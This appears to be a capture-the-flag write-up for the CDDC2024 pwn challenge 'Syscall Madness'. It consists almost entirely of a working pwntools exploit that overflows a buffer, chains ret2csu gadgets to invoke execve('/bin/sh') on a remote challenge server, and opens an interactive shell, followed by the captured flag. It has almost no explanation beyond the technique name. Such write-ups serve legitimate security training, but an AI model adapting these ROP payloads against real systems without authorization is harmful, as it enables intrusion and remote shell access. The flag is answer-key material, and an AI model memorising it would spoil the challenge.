Syscall Madness

Technique: Ret2Csu Syscall

Script

from pwn import *

elf = context.binary = ELF('syscall_madness')
rop = ROP(elf)

r = remote("3.1.147.170", 10009)
# r = elf.process()
# r = gdb.debug('./syscall_madness', gdbscript='''break * 0x401178''')

# pad
padding = b'A' * 16
bss = elf.bss() + 0x28
gets = elf.symbols.gets

syscall = 0x401152
ret = next(elf.search(asm('ret')))

# gadgets
pop_rax = rop.find_gadget(['pop rax', 'ret']).address
pop_rdi = rop.find_gadget(['pop rdi', 'ret']).address
pop_rsi = 0x401299

# ret2csu
pop_chain = 0x401294
reg_call = 0x401278

r.recvuntil(b'flag.txt fd is ')
fd = int(r.recvuntil(b'\n', drop=True).decode(),16)

r.recvuntil(b'&gift :')
gift = int(r.recvuntil(b'\n', drop=True).decode(),16)

read_payload = padding + p64(pop_rdi) + p64(bss) + p64(gets) + p64(pop_chain) + p64(bss) + p64(0) + p64(0x0) + p64(gift) + p64(pop_rax) + p64(59) + p64(reg_call) + p64(ret)

r.sendline(read_payload)
r.sendline(b'/bin/sh\x00')
r.interactive()

Flag

CDDC2024{D0_YOU_KNOW_4B0UT_SYSC4LL?}

Syscall Madness

Script​

Flag​

Script

Flag